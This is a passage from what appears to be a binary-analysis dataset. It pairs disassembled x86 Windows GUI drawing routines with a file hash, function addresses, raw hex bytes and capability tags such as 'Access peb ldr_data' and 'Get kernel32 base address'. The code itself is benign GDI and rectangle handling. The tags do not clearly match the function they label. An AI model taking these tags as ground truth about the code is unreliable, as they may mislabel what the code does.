"cmp ebx, dword [esp + 0x7c]",
"jg 0x4458ac",
"cmp edi, eax",
"jl 0x44567a",
"mov eax, dword [esp + 0x10]",
"cmp edi, eax",
"mov edi, dword [esp + 0x24]",
"jge 0x445584",
"mov ecx, eax",
"mov eax, dword [esp + 0x38]",
"sub edi, ecx",
"add edi, eax",
"push edi",
"mov ecx, esi",
"mov dword [esp + 0x18], ebx",
"call fcn.00444100",
"push eax",
"push ebx",
"mov ecx, esi",
"call fcn.004442c0",
"mov dword [esp + 0x1c], eax",
"mov eax, dword [esp + 0x40]",
"lea ecx, [esp + 0x74]",
"mov dword [esp + 0x20], eax",
"lea edx, [esp + 0x14]",
"push ecx",
"lea eax, [esp + 0x1d0]",
"push edx",
"push eax",
"mov dword [esp + 0x24], ebp",
"call dword [sym.imp.USER32.dll_IntersectRect]",
"mov edx, dword [esp + 0x1d0]",
"mov ecx, dword [esp + 0x1cc]",
"mov eax, dword [esp + 0x1d4]",
"mov dword [esp + 0x1e0], edx",
"mov dword [esp + 0x1dc], ecx",
"mov ecx, dword [esp + 0x1d8]",
"lea edx, [esp + 0x1dc]",
"mov dword [esp + 0x1e4], eax",
"push edx",
"mov dword [esp + 0x1ec], ecx",
"call dword [sym.imp.USER32.dll_IsRectEmpty]",
"test eax, eax",
"jne 0x445676",
"mov ecx, dword [esp + 0x50]",
"lea eax, [esp + 0xb0]",
"push eax",
"push edi",
"call fcn.004406c0",
"lea ecx, [esp + 0x90]",
"test ecx, ecx",
"je 0x445642",
"mov eax, dword [esp + 0x94]",
"cmp eax, ebp",
"je 0x445642",
"mov edx, dword [esp + 0xc0]",
"push eax",
"push edx",
"call dword [sym.imp.GDI32.dll_SelectObject]",
"push ebp",
"lea ecx, [esp + 0xc0]",
"call fcn.004b2f29",
"mov eax, dword [esp + 0xb0]",
"lea edx, [esp + 0x14]",
"push 0x825",
"push edx",
"mov ecx, dword [eax - 8]",
"push ecx",
"push eax",
"mov eax, dword [esp + 0xcc]",
"lea ecx, [esp + 0xcc]",
"call dword [eax + 0x68]",
"mov edi, dword [esp + 0x24]",
"lea ecx, [esp + 0x110]",
"push ecx",
"lea ecx, [esp + 0xc0]",
"call fcn.004b2d95",
"mov edx, dword [esp + 0x2c]",
"lea eax, [edx - 1]",
"cmp edi, eax",
"jne 0x44579f",
"mov eax, dword [esp + 0x3c]",
"mov ecx, dword [esp + 0x74]",
"cmp eax, ecx",
"jl 0x445796",
"mov edx, dword [esp + 0xc4]",
"mov eax, 1",
"lea ecx, [esp + 0x30]",
"push eax",
"push ecx",
"push edx",
"mov dword [esp + 0x3c], eax",
"mov dword [esp + 0x40], eax",
"call dword [sym.imp.GDI32.dll_DPtoLP]",
"lea eax, [esp + 0x138]",
"lea ecx, [esp + 0xbc]",
"push eax",
"call fcn.004b2d95",
"mov ebx, dword [esp + 0x40]",
"mov ecx, dword [esp + 0x30]",
"push ebx",
"lea edx, [esp + 0x22c]",
"push ecx",
"push edx",
"lea ecx, [esp + 0xc8]",
"call fcn.004b3286",
"mov eax, dword [esp + 0x34]",
"mov ecx, dword [esp + 0x30]",
"push eax",
"push ecx",
"lea ecx, [esp + 0xc4]",
"call fcn.004b32d2",
"mov edx, dword [esp + 0x34]",
"mov eax, dword [esp + 0x3c]",
"push edx",
"push eax",
"lea ecx, [esp + 0xc4]",
"call fcn.004b32d2",
"lea ecx, [esp + 0x110]",
"push ecx",
"lea ecx, [esp + 0xc0]",
"call fcn.004b2d95",
"push ebx",
"lea edx, [esp + 0x23c]",
"push ebp",
"push edx",
"lea ecx, [esp + 0xc8]",
"call fcn.004b3286",
"push ebp",
"push ebp",
"lea ecx, [esp + 0xc4]",
"call fcn.004b32d2",
"mov eax, dword [esp + 0x3c]",
"push ebp",
"push eax",
"lea ecx, [esp + 0xc4]",
"call fcn.004b32d2",
"mov ecx, dword [esp + 0x3c]",
"push ebx",
"push ecx",
"lea ecx, [esp + 0xc4]",
"call fcn.004b32d2",
"push ebx",
"push ebp",
"lea ecx, [esp + 0xc4]",
"call fcn.004b32d2",
"mov ebx, dword [esp + 0x3c]",
"jmp 0x44589b",
"mov ecx, dword [esp + 0x10]",
"mov eax, edi",
"cmp edi, ecx",
"jge 0x4457b1",
"sub eax, ecx",
"mov ecx, dword [esp + 0x38]",
"add eax, ecx",
"push eax",
"mov ecx, esi",
"call fcn.00444100",
"push eax",
"push ebx",
"mov ecx, esi",
"call fcn.004442c0",
"mov edi, eax",
"mov eax, dword [esp + 0x74]",
"cmp edi, eax",
"jl 0x445895",
"mov eax, dword [esp + 0xc4]",
"lea edx, [esp + 0x30]",
"push 1",
"push edx",
"push eax",
"mov dword [esp + 0x3c], ebx",
"mov dword [esp + 0x40], ebp",
"call dword [sym.imp.GDI32.dll_LPtoDP]",
"mov ecx, dword [esp + 0x30]",
"mov edx, dword [esp + 0xc4]",
"inc ecx",
"push 1",
"mov dword [esp + 0x34], ecx",
"lea ecx, [esp + 0x34]",
"push ecx",
"push edx",
"call dword [sym.imp.GDI32.dll_DPtoLP]",
"lea eax, [esp + 0x138]",
"lea ecx, [esp + 0xbc]",
"push eax",
"call fcn.004b2d95",
"mov ecx, dword [esp + 0x40]",
"mov edx, dword [esp + 0x30]",
"push ecx",
"lea eax, [esp + 0x244]",
"push edx",
"push eax",
"lea ecx, [esp + 0xc8]",
"call fcn.004b3286",
"mov ecx, dword [esp + 0x30]",
"push ebp",
"push ecx",
"lea ecx, [esp + 0xc4]",
"call fcn.004b32d2",
"lea edx, [esp + 0x110]",
"lea ecx, [esp + 0xbc]",
"push edx",
"call fcn.004b2d95",
"push ebp",
"push edi",
"lea ecx, [esp + 0xc4]",
"call fcn.004b32d2",
"mov eax, dword [esp + 0x40]",
"lea ecx, [esp + 0xbc]",
"push eax",
"push edi",
"call fcn.004b32d2",
"mov ecx, dword [esp + 0x40]",
"push ecx",
"push ebx",
"lea ecx, [esp + 0xc4]",
"call fcn.004b32d2",
"mov ebx, edi",
"mov edi, dword [esp + 0x24]",
"mov eax, dword [esp + 0x44]",
"inc edi",
"cmp edi, eax",
"mov dword [esp + 0x24], edi",
"jl 0x445558",
"mov edx, dword [esp + 0x74]",
"mov eax, dword [esp + 0x3c]",
"cmp edx, eax",
"jg 0x445b8c",
"mov ebx, dword [esp + 0x28]",
"mov ecx, dword [esp + 0x58]",
"mov eax, dword [esp + 0x64]",
"mov edi, dword [esp + 0x40]",
"sub ebx, ecx",
"cmp ebx, eax",
"mov dword [esp + 0x24], ebx",
"jge 0x445b8c",
"jmp 0x4458e2",
"mov ebx, dword [esp + 0x24]",
"xor ebp, ebp",
"cmp edi, dword [esp + 0x80]",
"jg 0x445b8c",
"mov eax, dword [esp + 0x28]",
"cmp ebx, eax",
"jge 0x4458ff",
"sub ebx, eax",
"mov eax, dword [esp + 0x58]",
"add ebx, eax",
"push ebx",
"mov ecx, esi",
"call fcn.00444020",
"push eax",
"push edi",
"mov ecx, esi",
"call fcn.004443f0",
"mov ebp, eax",
"mov eax, dword [esp + 0x78]",
"cmp ebp, eax",
"jl 0x445b73",
"mov eax, dword [esp + 0x3c]",
"mov dword [esp + 0x14], 0",
"mov dword [esp + 0x1c], eax",
"mov eax, dword [esp + 0x54]",
"cmp eax, 1",
"mov dword [esp + 0x18], edi",
"mov dword [esp + 0x20], ebp",
"jne 0x445a09",
"lea ecx, [esp + 0x74]",
"lea edx, [esp + 0x14]",
"push ecx",
"lea eax, [esp + 0x18]",
"push edx",
"push eax",
"call dword [sym.imp.USER32.dll_IntersectRect]",
"lea ecx, [esp + 0x14]",
"push ecx",
"call dword [sym.imp.USER32.dll_IsRectEmpty]",
"test eax, eax",
"jne 0x445b73",
"lea edx, [esp + 0x174]",
"lea ecx, [esp + 0xbc]",
"push edx",
"call fcn.004b2d95",
"mov eax, dword [esp + 0x20]",
"mov edx, dword [esp + 0x18]",
"mov ecx, dword [esp + 0x1c]",
"mov edi, dword [esp + 0x14]",
"sub eax, edx",
"sub ecx, edi",
"push 0xf00021",
"push eax",
"mov eax, dword [esp + 0xc8]",
"push ecx",
"push edx",
"push edi",
"push eax",
"call dword [sym.imp.GDI32.dll_PatBlt]",
"mov edx, dword [esp + 0xc4]",
"lea ecx, [esp + 0x14]",
"push 2",
"push ecx",
"push edx",
"call dword [sym.imp.GDI32.dll_LPtoDP]",
"lea eax, [esp + 0x14]",
"push eax",
"call dword [sym.imp.GDI32.dll_CreateRectRgnIndirect]",
"push eax",
"lea ecx, [esp + 0x4c]",
"call fcn.004b3741",
"mov edi, dword [esp + 0x4c]",
"lea eax, [esp + 0x48]",
"mov edx, dword [esp + 0x6c]",
"lea ecx, [esp + 0x68]",
"neg eax",
"sbb eax, eax",
"push 4",
"and eax, edi",
"neg ecx",
"sbb ecx, ecx",
"push eax",
"and ecx, edx",
"push ecx",
"push edx",
"call dword [sym.imp.GDI32.dll_CombineRgn]",
"lea ecx, [esp + 0x48]",
"call fcn.004b3798",
"jmp 0x445b73",
"mov edx, dword [esp + 0xc4]",
"lea ecx, [esp + 0x30]",
"push 1",
"push ecx",
"push edx",
"mov dword [esp + 0x3c], 0",
"mov dword [esp + 0x40], edi",
"call dword [sym.imp.GDI32.dll_LPtoDP]",
"mov eax, dword [esp + 0x34]",
"mov ecx, dword [esp + 0xc4]",
"inc eax",
"push 1",
"mov dword [esp + 0x38], eax",
"lea eax, [esp + 0x34]",
"push eax",
"push ecx",
"call dword [sym.imp.GDI32.dll_DPtoLP]",
"lea edx, [esp + 0x138]",
"lea ecx, [esp + 0xbc]",
"push edx",
"call fcn.004b2d95",
"mov eax, dword [esp + 0x34]",
"lea ecx, [esp + 0x230]",
"push eax",
"push 0",
"push ecx",
"lea ecx, [esp + 0xc8]",
"call fcn.004b3286",
"mov edx, dword [esp + 0x34]",
"mov eax, dword [esp + 0x3c]",
"push edx",
"push eax",
"lea ecx, [esp + 0xc4]",
"call fcn.004b32d2",
"lea ecx, [esp + 0x110]",
"push ecx",
"lea ecx, [esp + 0xc0]",
"call fcn.004b2d95",
"mov edx, dword [esp + 0x3c]",
"push ebp",
"push edx",
"lea ecx, [esp + 0xc4]",
"call fcn.004b32d2",
"push ebp",
"push 0",
"lea ecx, [esp + 0xc4]",
"call fcn.004b32d2",
"push edi",
"push 0",
"lea ecx, [esp + 0xc4]",
"call fcn.004b32d2",
"inc ebx",
"lea eax, [esp + 0x248]",
"push ebx",
"push 0x4f8e3c",
"push eax",
"call dword [sym.imp.USER32.dll_wsprintfA]",
"lea ecx, [esp + 0x9c]",
"add esp, 0xc",
"test ecx, ecx",
"je 0x445b0e",
"mov eax, dword [esp + 0x94]",
"test eax, eax",
"je 0x445b0e",
"mov edx, dword [esp + 0xc0]",
"push eax",
"push edx",
"call dword [sym.imp.GDI32.dll_SelectObject]",
"push 0",
"lea ecx, [esp + 0xc0]",
"call fcn.004b2f29",
"lea eax, [esp + 0x248]",
"lea ecx, [esp + 0x158]",
"push eax",
"call fcn.004acb62",
"mov eax, dword [esp + 0x158]",
"lea edx, [esp + 0x14]",
"push 0x825",
"push edx",
"mov ecx, dword [eax - 8]",
"mov byte [esp + 0x28c], 0x12",
"push ecx",
"push eax",
"mov eax, dword [esp + 0xcc]",
"lea ecx, [esp + 0xcc]",
"call dword [eax + 0x68]",
"lea ecx, [esp + 0x158]",
"mov byte [esp + 0x284], 0x10",
"call fcn.004acaf4",
"mov eax, dword [esp + 0x24]",
"mov ecx, dword [esp + 0x64]",
"inc eax",
"mov edi, ebp",
"cmp eax, ecx",
"mov dword [esp + 0x24], eax",
"jl 0x4458dc",
"xor ebp, ebp",
"mov ebx, dword [esp + 0x40]",
"jmp 0x445d0a",
"cmp edi, 2",
"jne 0x445d08",
"cmp dword [esp + 0x78], 4",
"jg 0x445c53",
"cmp dword [esp + 0x58], ebp",
"jne 0x445c53",
"cmp dword [esp + 0x28], ebp",
"jle 0x445c53",
"mov ebx, dword [esp + 0x10]",
"mov ecx, dword [esp + 0x38]",
"mov eax, dword [esp + 0x44]",
"sub ebx, ecx",
"cmp ebx, eax",
"mov dword [esp + 0x2c], ebp",
"mov dword [esp + 0xac], ebp",
"jge 0x445c53",
"mov eax, dword [esp + 0x10]",
"mov edi, ebx",
"cmp ebx, eax",
"jge 0x445bee",
"mov ecx, eax",
"mov eax, dword [esp + 0x38]",
"sub edi, ecx",
"add edi, eax",
"push edi",
"mov ecx, esi",
"call fcn.00444100",
"mov ecx, dword [esp + 0x28]",
"mov dword [esp + 0xa8], eax",
"push edi",
"lea eax, [ecx - 1]",
"mov ecx, dword [esp + 0x54]",
"push eax",
"call fcn.00440760",
"push eax",
"mov eax, dword [esp + 0x2c]",
"lea edx, [esp + 0xac]",
"push 0x10",
"push edx",
"dec eax",
"push edi",
"mov edi, dword [esp + 0x3c]",
"push eax",
"push ebp",
"lea ecx, [esp + 0xd4]",
"push edi",
"push ecx",
"mov ecx, esi",
"call fcn.00448120",
"mov edx, dword [esp + 0xa8]",
"mov ecx, esi",
"push edx",
"push edi",
"call fcn.004442c0",
"mov dword [esp + 0x2c], eax",
"mov eax, dword [esp + 0x44]",
"inc ebx",
"cmp ebx, eax",
"jl 0x445bda",
"cmp dword [esp + 0x74], 4",
"jg 0x445d08",
"cmp dword [esp + 0x38], ebp",
"jne 0x445d08",
"cmp dword [esp + 0x10], ebp",
"jle 0x445d08",
"mov ebx, dword [esp + 0x28]",
"mov ecx, dword [esp + 0x58]",
"mov eax, dword [esp + 0x64]",
"sub ebx, ecx",
"cmp ebx, eax",
"mov dword [esp + 0x2c], ebp",
"mov dword [esp + 0xa8], ebp",
"jge 0x445d08",
"mov eax, dword [esp + 0x28]",
"mov edi, ebx",
"cmp ebx, eax",
"jge 0x445ca3",
"mov ecx, eax",
"mov eax, dword [esp + 0x58]",
"sub edi, ecx",
"add edi, eax",
"push edi",
"mov ecx, esi",
"call fcn.00444020",
"mov ecx, dword [esp + 0x50]",
"mov dword [esp + 0xac], eax",
"mov eax, dword [esp + 0x10]",
"dec eax",
"push eax",
"push edi",
"call fcn.00440760",
"mov edx, dword [esp + 0x10]",
"push eax",
"lea ecx, [esp + 0xac]",
"push 8",
"lea eax, [edx - 1]",
"push ecx",
"push eax",
"push edi",
"mov edi, dword [esp + 0x40]",
"lea eax, [esp + 0xd0]",
"push edi",
"push ebp",
"push eax",
"mov ecx, esi",
"call fcn.00448120",
"mov ecx, dword [esp + 0xac]",
"push ecx",
"push edi",
"mov ecx, esi",
"call fcn.004443f0",
"mov dword [esp + 0x2c], eax",
"mov eax, dword [esp + 0x64]",
"inc ebx",
"cmp ebx, eax",
"jl 0x445c8f",
"xor ebx, ebx",
"push 0xffffffffffffffff",
"push ebp",
"lea ecx, [esp + 0x16c]",
"mov dword [esp + 0x90], ebx",
"call fcn.0042ecb0",
"push 0xffffffffffffffff",
"push ebp",
"lea ecx, [esp + 0x184]",
"call fcn.0042ecb0",
"mov edi, dword [esp + 0x28]",
"mov ecx, dword [esp + 0x58]",
"mov eax, dword [esp + 0x64]",
"sub edi, ecx",
"cmp edi, eax",
"mov dword [esp + 0x24], edi",
"jge 0x4461bf",
"jmp 0x445d4d",
"xor ebp, ebp",
"cmp ebx, dword [esp + 0x80]",
"jg 0x4461bf",
"mov eax, dword [esp + 0x28]",
"mov ebp, edi",
"cmp edi, eax",
"jge 0x445d6c",
"sub ebp, eax",
"mov eax, dword [esp + 0x58]",
"add ebp, eax",
"push ebp",
"mov ecx, esi",
"mov dword [esp + 0x60], ebp",
"call fcn.00444020",
"push eax",
"push ebx",
"mov ecx, esi",
"call fcn.004443f0",
"mov ecx, eax",
"mov eax, dword [esp + 0x78]",
"cmp ecx, eax",
"mov dword [esp + 0x1ac], ecx",
"jl 0x4461a3",
"mov edx, dword [esp + 0x3c]",
"mov eax, dword [esp + 0x10]",
"mov ebx, dword [esp + 0x38]",
"mov dword [esp + 0x8c], edx",
"mov edx, dword [esp + 0x44]",
"sub eax, ebx",
"cmp eax, edx",
"mov dword [esp + 0x2c], eax",
"jge 0x4461a3",
"mov ecx, dword [esp + 0x10]",
"jmp 0x445dcd",
"mov ecx, dword [esp + 0x10]",
"mov ebp, dword [esp + 0x5c]",
"mov eax, dword [esp + 0x2c]",
"cmp eax, ecx",
"jge 0x445dd9",
"mov edx, dword [esp + 0x38]",
"sub eax, ecx",
"add eax, edx",
"mov edx, dword [esp + 0x28]",
"mov dword [esp + 0x60], eax",
"cmp ebp, edx",
"jge 0x445df8",
"cmp eax, ecx",
"jge 0x445def",
"lea eax, [esp + 0x74]",
"jmp 0x445e0a",
"lea eax, [esp + 0x118]",
"jmp 0x445e0a",
"cmp eax, ecx",
"lea eax, [esp + 0x128]",
"jl 0x445e0a",
"lea eax, [esp + 0x98]",
"mov ecx, dword [eax]",
"mov edx, dword [eax + 4]",
"mov edi, dword [esp + 0x60]",
"mov ebp, dword [esp + 0x5c]",
"mov dword [esp + 0x198], ecx",
"mov ecx, dword [eax + 8]",
"mov ebx, dword [esp + 0x88]",
"mov dword [esp + 0x1a0], ecx",
"push 0",
"mov dword [esp + 0x1a0], edx",
"mov edx, dword [eax + 0xc]",
"mov eax, dword [esp + 0x90]",
"push edi",
"lea ecx, [esp + 0x1f4]",
"push ebp",
"push ecx",
"mov ecx, dword [esp + 0x60]",
"mov dword [esp + 0x1b4], edx",
"mov dword [esp + 0x94], eax",
"call fcn.00440720",
"lea ecx, [esp + 0x1ec]",
"call fcn.004428e0",
"test eax, 0x3c0000",
"je 0x445fcf",
"lea ecx, [esp + 0x1ec]",
"call fcn.004428e0",
"test eax, 0x40000",
"je 0x445edb",
"mov edx, dword [esp + 0x5c]",
"mov ecx, dword [esp + 0x50]",
"dec edi",
"push 0",
"push edi",
"lea eax, [esp + 0x1f4]",
"push edx",
"push eax",
"call fcn.00440720",
"push edi",
"mov ecx, esi",
"call fcn.00444100",
"mov ecx, dword [esp + 0x84]",
"neg eax",
"push eax",
"push ecx",
"mov ecx, esi",
"call fcn.004442c0",
"lea ecx, [esp + 0x1ec]",
"mov dword [esp + 0x84], eax",
"call fcn.004428e0",
"test eax, 0x40000",
"jne 0x445e8d",
"lea ecx, [esp + 0x1ec]",
"call fcn.004428e0",
"test eax, 0x80000",
"je 0x445f2c",
"mov ecx, dword [esp + 0x50]",
"dec ebp",
"push 0",
"push edi",
"lea edx, [esp + 0x1f4]",
"push ebp",
"push edx",
"call fcn.00440720",
"push ebp",
"mov ecx, esi",
"call fcn.00444020",
"neg eax",
"push eax",
"push ebx",
"mov ecx, esi",
"call fcn.004443f0",
"lea ecx, [esp + 0x1ec]",
"mov ebx, eax",
"call fcn.004428e0",
"test eax, 0x80000",
"jne 0x445eee",
"mov edx, dword [esp + 0x168]",
"mov dword [esp + 0x140], 0",
"test edx, edx",
"jle 0x445f7f",
"mov eax, dword [esp + 0x17c]",
"mov ecx, dword [esp + 0x164]",
"sub ecx, eax",
"mov dword [esp + 0x70], ecx",
"jmp 0x445f5c",
"mov ecx, dword [esp + 0x70]",
"cmp dword [ecx + eax], ebp",
"jne 0x445f69",
"cmp dword [eax], edi",
"je 0x445ffd",
"mov ecx, dword [esp + 0x140]",
"add eax, 4",
"inc ecx",
"cmp ecx, edx",
"mov dword [esp + 0x140], ecx",
"jl 0x445f58",
"cmp ebp, 0xffffffff",
"je 0x445fcf",
"mov dword [esp + 0x70], edx",
"inc edx",
"push 0xffffffffffffffff",
"push edx",
"lea ecx, [esp + 0x16c]",
"call fcn.0042ecb0",
"mov eax, dword [esp + 0x164]",
"mov ecx, dword [esp + 0x70]",
"push 0xffffffffffffffff",
"mov dword [eax + ecx*4], ebp",
"mov eax, dword [esp + 0x184]",
"mov dword [esp + 0x74], eax",
"inc eax",
"push eax",
"lea ecx, [esp + 0x184]",
"call fcn.0042ecb0",
"mov edx, dword [esp + 0x17c]",
"mov eax, dword [esp + 0x70]",
"mov dword [edx + eax*4], edi",
"cmp dword [esp + 0x54], 2",
"jne 0x446029",
"mov ecx, dword [esp + 0x28]",
"mov eax, dword [esp + 0x5c]",
"cmp eax, ecx",
"jge 0x446002",
"mov edx, dword [esp + 0x10]",
"mov ecx, dword [esp + 0x60]",
"xor eax, eax",
"cmp ecx, edx",
"setl al",
"dec eax",
"lea ecx, [esp + 0x150]",
"and eax, ecx",
"jmp 0x44601c",
"or ebp, 0xffffffff",
"jmp 0x445fcf",
"mov edx, dword [esp + 0x10]",
"mov eax, dword [esp + 0x60]",
"cmp eax, edx",
"lea eax, [esp + 0x15c]",
"jl 0x44601c",
"lea eax, [esp + 0x148]",
"push eax",
"lea ecx, [esp + 0xc0]",
"call fcn.004b31c2",
"cmp ebp, 0xffffffff",
"je 0x446113",
"cmp dword [esp + 0x54], 1",
"jne 0x4460ed",
"mov edx, dword [esp + 0x84]",
"lea eax, [esp + 0x14]",
"lea ecx, [esp + 0x198]",
"push eax",
"push ecx",
"push 0x20",
"push edi",
"push ebp",
"push ebx",
"lea eax, [esp + 0xd4]",
"push edx",
"push eax",
"mov ecx, esi",
"call fcn.004477e0",
"lea ecx, [esp + 0x198]",
"lea edx, [esp + 0x14]",
"push ecx",
"lea eax, [esp + 0x18]",
"push edx",
"push eax",
"call dword [sym.imp.USER32.dll_IntersectRect]",
"lea ecx, [esp + 0x14]",
"push ecx",
"call dword [sym.imp.USER32.dll_IsRectEmpty]",
"test eax, eax",
"jne 0x446160",
"mov eax, dword [esp + 0xc4]",
"lea edx, [esp + 0x14]",
"push 2",
"push edx",
"push eax",
"call dword [sym.imp.GDI32.dll_LPtoDP]",
"lea ecx, [esp + 0x14]",
"push ecx",
"call dword [sym.imp.GDI32.dll_CreateRectRgnIndirect]",
"push eax",
"lea ecx, [esp + 0x4c]",
"call fcn.004b3741",
"mov ebp, dword [esp + 0x4c]",
"lea eax, [esp + 0x48]",
"mov edx, dword [esp + 0x6c]",
"lea ecx, [esp + 0x68]",
"neg eax",
"sbb eax, eax",
"push 4",
"and eax, ebp",
"neg ecx",
"sbb ecx, ecx",
"push eax",
"and ecx, edx",
"push ecx",
"push edx",
"call dword [sym.imp.GDI32.dll_CombineRgn]",
"lea ecx, [esp + 0x48]",
"call fcn.004b3798",
"jmp 0x446160",
"mov eax, dword [esp + 0x84]",
"lea edx, [esp + 0x198]",
"push 0",
"push edx",
"push 1",
"push edi",
"push ebp",
"push ebx",
"lea ecx, [esp + 0xd4]",
"push eax",
"push ecx",
"mov ecx, esi",
"call fcn.004477e0",
"cmp dword [esp + 0x54], 2",
"jne 0x446160",
"mov eax, dword [esp + 0x144]",
"mov ecx, dword [esp + 0x60]",
"dec eax",
"lea edx, [esp + 0x198]",
"neg eax",
"sbb eax, eax",
"push 0",
"and eax, 6",
"push edx",
"mov edx, dword [esp + 0x64]",
"add eax, 0x18",
"push eax",
"mov eax, dword [esp + 0x94]",
"push ecx",
"mov ecx, dword [esp + 0x9c]",
"push edx",
"push eax",
"lea edx, [esp + 0xd4]",
"push ecx",
"push edx",
"mov ecx, esi",
"call fcn.004477e0",
"mov eax, dword [esp + 0x60]",
"mov ecx, esi",
"push eax",
"call fcn.00444100",
"mov ecx, dword [esp + 0x8c]",
"push eax",
"push ecx",
"mov ecx, esi",
"call fcn.004442c0",
"mov ecx, dword [esp + 0x44]",
"mov dword [esp + 0x8c], eax",
"mov eax, dword [esp + 0x2c]",
"inc eax",
"cmp eax, ecx",
"mov dword [esp + 0x2c], eax",
"jl 0x445dc1",
"mov edi, dword [esp + 0x24]",
"mov ecx, dword [esp + 0x1ac]",
"mov eax, dword [esp + 0x64]",
"inc edi",
"mov ebx, ecx",
"cmp edi, eax",
"mov dword [esp + 0x88], ebx",
"mov dword [esp + 0x24], edi",
"jl 0x445d4b",
"xor ebp, ebp",
"push ebp",
"lea ecx, [esp + 0xc0]",
"call fcn.004b31c2",
"mov eax, dword [esp + 0x54]",
"inc eax",
"cmp eax, 2",
"mov dword [esp + 0x54], eax",
"jle 0x445334",
"mov eax, dword [esi + 0x44c]",
"pop ebx",
"cmp eax, ebp",
"je 0x4461f0",
"mov ecx, esi",
"call fcn.004464e0",
"push ebp",
"lea ecx, [esp + 0xbc]",
"call fcn.004b31c2",
"mov edx, dword [esp + 0x18c]",
"lea ecx, [esp + 0xb8]",
"push edx",
"call fcn.004b2d95",
"mov eax, dword [esp + 0x190]",
"lea ecx, [esp + 0xb8]",
"push eax",
"call fcn.004b2d95",
"mov ecx, dword [esp + 0x1ac]",
"push ecx",
"lea ecx, [esp + 0xbc]",
"call fcn.004b2d95",
"mov edx, dword [esp + 0x188]",
"mov ecx, esi",
"push edx",
"call fcn.004447e0",
"lea ecx, [esp + 0xac]",
"mov byte [esp + 0x280], 0xf",
"call fcn.004acaf4",
"lea ecx, [esp + 0x1e8]",
"mov byte [esp + 0x280], 0xe",
"call fcn.00442820",
"mov eax, dword [esp + 0x178]",
"cmp eax, ebp",
"je 0x446284",
"push eax",
"call fcn.004ac85e",
"add esp, 4",
"mov eax, dword [esp + 0x160]",
"cmp eax, ebp",
"je 0x446298",
"push eax",
"call fcn.004ac85e",
"add esp, 4",
"mov esi, vtable.CGdiObject.0",
"mov dword [esp + 0x1c0], esi",
"lea ecx, [esp + 0x1c0]",
"mov byte [esp + 0x280], 0x13",
"call fcn.004b3798",
"mov dword [esp + 0x10c], esi",
"lea ecx, [esp + 0x10c]",
"mov byte [esp + 0x280], 0x14",
"call fcn.004b3798",
"mov dword [esp + 0x134], esi",
"lea ecx, [esp + 0x134]",
"mov byte [esp + 0x280], 0x15",
"call fcn.004b3798",
"mov dword [esp + 0x170], esi",
"lea ecx, [esp + 0x170]",
"mov byte [esp + 0x280], 0x16",
"call fcn.004b3798",
"mov dword [esp + 0x8c], esi",
"lea ecx, [esp + 0x8c]",
"mov byte [esp + 0x280], 0x17",
"call fcn.004b3798",
"mov dword [esp + 0x44], esi",
"lea ecx, [esp + 0x44]",
"mov byte [esp + 0x280], 0x18",
"call fcn.004b3798",
"mov dword [esp + 0x64], esi",
"lea ecx, [esp + 0x64]",
"mov byte [esp + 0x280], 0x19",
"call fcn.004b3798",
"mov dword [esp + 0x158], esi",
"lea ecx, [esp + 0x158]",
"mov byte [esp + 0x280], 0x1a",
"call fcn.004b3798",
"mov dword [esp + 0x14c], esi",
"lea ecx, [esp + 0x14c]",
"mov byte [esp + 0x280], 0x1b",
"call fcn.004b3798",
"mov dword [esp + 0x144], esi",
"lea ecx, [esp + 0x144]",
"mov byte [esp + 0x280], 0x1c",
"call fcn.004b3798",
"lea ecx, [esp + 0x1a4]",
"call fcn.00444010",
"jmp 0x4463fe",
"mov eax, dword [esi + 0x40]",
"lea ecx, [esp + 0xb0]",
"push eax",
"call fcn.004b37fe",
"cmp eax, ebp",
"jne 0x4463c5",
"xor eax, eax",
"jmp 0x4463c8",
"mov eax, dword [eax + 4]",
"mov edx, dword [esp + 0xbc]",
"lea ecx, [esp + 0x1b0]",
"push eax",
"push ecx",
"push edx",
"call dword [sym.imp.USER32.dll_FillRect]",
"mov dword [esp + 0xb0], vtable.CGdiObject.0",
"lea ecx, [esp + 0xb0]",
"mov byte [esp + 0x280], 1",
"call fcn.004b3798",
"lea ecx, [esp + 0xb8]",
"mov dword [esp + 0x280], 0xffffffff",
"call fcn.004b3673",
"mov ecx, dword [esp + 0x278]",
"pop edi",
"pop esi",
"pop ebp",
"mov dword fs:[0], ecx",
"add esp, 0x278",
"ret"
] |
f53a5abe6cd77afda63f23dd6f0e75472256e1f40737ab4e61eea0208fed039d
|
0x4467a0
|
[
"Access peb ldr_data",
"Get kernel32 base address"
] |
6aff6868b14b0064a100000000506489250000000083ec548b4424748b54246c568bf18b4c247457508b44247451528d4c241450518bcee8940c00008d5424185052ff159cf54b008b44241833ff33c93bc70f9cc14933d223c88b44241c3bc7894c24180f9cc24a23d08d4424185089542420ff150cf64b0085c0742c8b44246c538bd833c933d233f6890b895304897308897b0c5b5f5e8b4c245464890d0000000083c460c214008d4c2408518bcee8dbfbffff8bd08b028b4a0451508d44242050ff15d8f54b00578d4c244ce826cc06008b4e5c8b5658518d44244c5250897c2470e8974701008b54245c83c40c8d4c24186a025152ff1594f14b008b4e1c8d4424385051ff1538f64b008d5424388d442418528d4c242c5051ff15ccf54b008b74246c8b4424288b4c242c8bd6c7442464ffffffff89028b442430894a048b4c2434894208894a0c8d4c2448e817cc06008b4c245c8bc65f5e64890d0000000083c460c21400
|
[
"push 0xffffffffffffffff",
"push 0x4bb168",
"mov eax, dword fs:[0]",
"push eax",
"mov dword fs:[0], esp",
"sub esp, 0x54",
"mov eax, dword [esp + 0x74]",
"mov edx, dword [esp + 0x6c]",
"push esi",
"mov esi, ecx",
"mov ecx, dword [esp + 0x74]",
"push edi",
"push eax",
"mov eax, dword [esp + 0x74]",
"push ecx",
"push edx",
"lea ecx, [esp + 0x14]",
"push eax",
"push ecx",
"mov ecx, esi",
"call fcn.00447470",
"lea edx, [esp + 0x18]",
"push eax",
"push edx",
"call dword [sym.imp.USER32.dll_CopyRect]",
"mov eax, dword [esp + 0x18]",
"xor edi, edi",
"xor ecx, ecx",
"cmp eax, edi",
"setl cl",
"dec ecx",
"xor edx, edx",
"and ecx, eax",
"mov eax, dword [esp + 0x1c]",
"cmp eax, edi",
"mov dword [esp + 0x18], ecx",
"setl dl",
"dec edx",
"and edx, eax",
"lea eax, [esp + 0x18]",
"push eax",
"mov dword [esp + 0x20], edx",
"call dword [sym.imp.USER32.dll_IsRectEmpty]",
"test eax, eax",
"je 0x446849",
"mov eax, dword [esp + 0x6c]",
"push ebx",
"mov ebx, eax",
"xor ecx, ecx",
"xor edx, edx",
"xor esi, esi",
"mov dword [ebx], ecx",
"mov dword [ebx + 4], edx",
"mov dword [ebx + 8], esi",
"mov dword [ebx + 0xc], edi",
"pop ebx",
